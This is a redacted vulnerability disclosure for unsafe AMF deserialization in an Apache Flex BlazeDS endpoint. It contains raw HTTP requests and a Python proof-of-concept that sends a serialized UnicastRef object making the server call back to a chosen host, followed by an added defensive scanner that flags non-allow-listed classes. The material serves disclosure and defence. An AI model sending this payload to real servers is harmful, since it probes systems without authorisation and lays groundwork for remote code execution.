CVSS2
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score
Confidence: High

EPSS
Percentile: 94.2%
## Description
We identified a potential unsafe deserialization vulnerability on the https://www.█████/daip/messagebroker/amf endpoint.
## POC
To exclude a false-positive reaction and show that the pingback is the result of AMF deserialization, and not a reaction to the external host in the POST body, first send this request:
```http
POST /daip/messagebroker/amf HTTP/1.1
Host: www.███████
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
Content-Type: application/x-amf
Content-Length: 51

<your collaborator host>
```
Nothing will happen. You will receive something like this:
███
You can wait a few minutes to make sure that no callback arrives.
Next, send the collaborator host inside the serialized AMF payload using this script, e.g. `script.py <collaborator> 80`:
```python
import struct
import sys

import requests

if len(sys.argv) != 3:
    print("Usage: script.py <host> <port>")
    sys.exit(1)

callback_IP = sys.argv[1]
callback_port = sys.argv[2]

# AMF0 envelope, then an AMF3 externalizable object of class
# sun.rmi.server.UnicastRef whose embedded endpoint is the collaborator host
# (2-byte length prefix + UTF) and port (4-byte big-endian int); the trailing
# fixed bytes complete the serialized reference (object identifier fields).
amf_payload = (
    b'\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a'
    + b'\x07\x33' + b'sun.rmi.server.UnicastRef'
    + struct.pack('>H', len(callback_IP)) + callback_IP.encode('ascii')
    + struct.pack('>I', int(callback_port))
    + b'\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00'
)

url = "https://www.███████/daip/messagebroker/amf"
headers = {'Content-Type': 'application/x-amf'}
# verify=False skips TLS certificate validation, as in the original script
response = requests.post(url, headers=headers, data=amf_payload, verify=False)
```
This will result in a significant delay, and soon you will get a pingback from the ███/███ IP.
This indicates that the backend server deserialized the AMF data and triggered a DNS lookup (there won't be an HTTP request, since sun.rmi.server.UnicastRef doesn't communicate via HTTP).
## Suggested fix
Update the Apache Flex BlazeDS library.

## Impact
Unsafe deserialization of AMF data.
We will work on this and try to improve the impact, if possible.
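As an added defensive example (not part of the report, and not BlazeDS's own validator), the scanner below looks for inline AMF3 externalizable object headers in a request body and reports class names outside an assumed allow-list (here the `flex.messaging.` prefix), which can feed proxy logging or blocking while the library update is rolled out. It is a byte-level heuristic rather than a full AMF parser, and both sample bodies are constructed, not captured.

```python
import re

# Assumed allow-list of class prefixes BlazeDS legitimately deserializes as
# AMF3 externalizable objects; tune it to the application's own types.
ALLOWED_CLASS_PREFIXES = ("flex.messaging.",)
_CLASS_NAME = re.compile(rb"^[A-Za-z_$][A-Za-z0-9_$.]*$")

def read_u29(buf, pos):
    """Decode an AMF3 U29 variable-length integer; returns (value, next_pos)."""
    value = 0
    for i in range(4):
        if pos >= len(buf):
            raise ValueError("truncated U29")
        b, pos = buf[pos], pos + 1
        if i == 3:                      # fourth byte carries all eight bits
            return (value << 8) | b, pos
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            return value, pos

def externalizable_classes(body):
    """Class names of inline AMF3 externalizable objects found in body.
    AMF3 encodes one as 0x0A (object marker), a U29 traits value whose low three
    bits are 0b111 (inline object, inline traits, externalizable), then a U29
    string header (len << 1 | 1) and the class name. Heuristic, not a full parser.
    """
    found = []
    for i in range(len(body) - 1):
        if body[i] != 0x0A:
            continue
        try:
            traits, pos = read_u29(body, i + 1)
            header, pos = read_u29(body, pos)
        except ValueError:
            continue
        if traits & 0x07 != 0x07 or not header & 1:   # not ext. / name is a ref
            continue
        name = body[pos:pos + (header >> 1)]
        if len(name) == header >> 1 and _CLASS_NAME.match(name):
            found.append(name.decode("ascii"))
    return found

def disallowed_classes(body, allowed_prefixes=ALLOWED_CLASS_PREFIXES):
    # Externalizable class names in body that fall outside the allow-list.
    return [c for c in externalizable_classes(body) if not c.startswith(allowed_prefixes)]

# Constructed sample bodies (not captured traffic): the report's AMF0 envelope,
# then one externalizable object header (0x0A, traits 0x07, U29 length, name).
_AMF0_ENVELOPE = b"\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11"
SUSPICIOUS_BODY = _AMF0_ENVELOPE + b"\x0a\x07\x33sun.rmi.server.UnicastRef" + b"\x00" * 8
BENIGN_BODY = _AMF0_ENVELOPE + b"\x0a\x07\x43flex.messaging.io.ArrayCollection\x09\x01\x01"
```

Running `disallowed_classes` over the two constructed bodies returns `['sun.rmi.server.UnicastRef']` for the suspicious one and an empty list for the benign one.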